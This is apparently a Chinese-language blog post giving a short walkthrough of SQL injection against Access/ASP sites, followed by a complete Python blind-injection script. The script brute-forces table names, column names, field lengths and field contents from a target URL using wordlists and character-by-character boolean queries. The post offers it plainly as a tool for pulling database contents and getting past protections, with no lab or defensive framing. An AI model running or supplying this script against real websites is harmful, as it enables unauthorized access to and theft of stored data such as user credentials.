0x00:前言
自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。
Access、Asp注入一般流程:
理论 https://www.cnblogs.com/liqik/p/12333378.html
(1)找到注入点
'
and 1=1
and 1=2
(2)猜解关键段
order by
联合查询找出显示点,注意隐式显示查看源码
union select ,,,,,,
(3)猜解表名
(4)猜解列名
(5)猜解内容
0x01:SQL工具
# _*_ coding:utf-8 _*_ ''' 该脚本主要针对Access、ASP注入 ''' import requests def getable(url): #获取表名 for line in open('tables.txt','r'): target = url + "and exists(select * from " + line + ")" response = requests.get(target) response.encoding = 'gb2312' if "XYCMS" in response.text: #如果有返回结果 print(line+" ") def getcolumn(url): #获取列名 tablename = input("which table ? ") print("columns' name : ") for line in open('columns.txt','r'): target = url + "and (select count(" + line +") from "+ tablename +")>0" response = requests.get(target) response.encoding = 'gb2312' if "XYCMS" in response.text: print(line+" ",end='') def getcolumnlen(url,tablename,columname): for i in range(1,30): target = url + "and (select top 1 len("+columname+") from "+tablename+") = " + str(i) r = requests.get(target) r.encoding = 'gb2312' if "XYCMS" in r.text: print("第一个字段长度:" + str(i)) return i def getmsg(len,url,tablename,columname): #只能获得第一行数据 result = "" for i in range(1,len+1): for j in range(48,127): target = url + "and (select top 1 asc(mid("+columname+","+str(i)+",1)) from "+ tablename +")= "+str(j) #and (select top 1 asc(mid(列名,{0},1)) from 表名)= {1} r2 = requests.get(target) r2.encoding = 'gb2312' if "XYCMS" in r2.text: result += chr(j) print(result) if __name__ == '__main__': url = "http://xxxxxxxxxx?id=1" #getable(url) print("tables done.") #getcolumn(url) print("columns done") tablename = input("which table ?") columname = input("which column ?") length = getcolumnlen(url,tablename,columname) getmsg(length,url,tablename,columname) print("done!")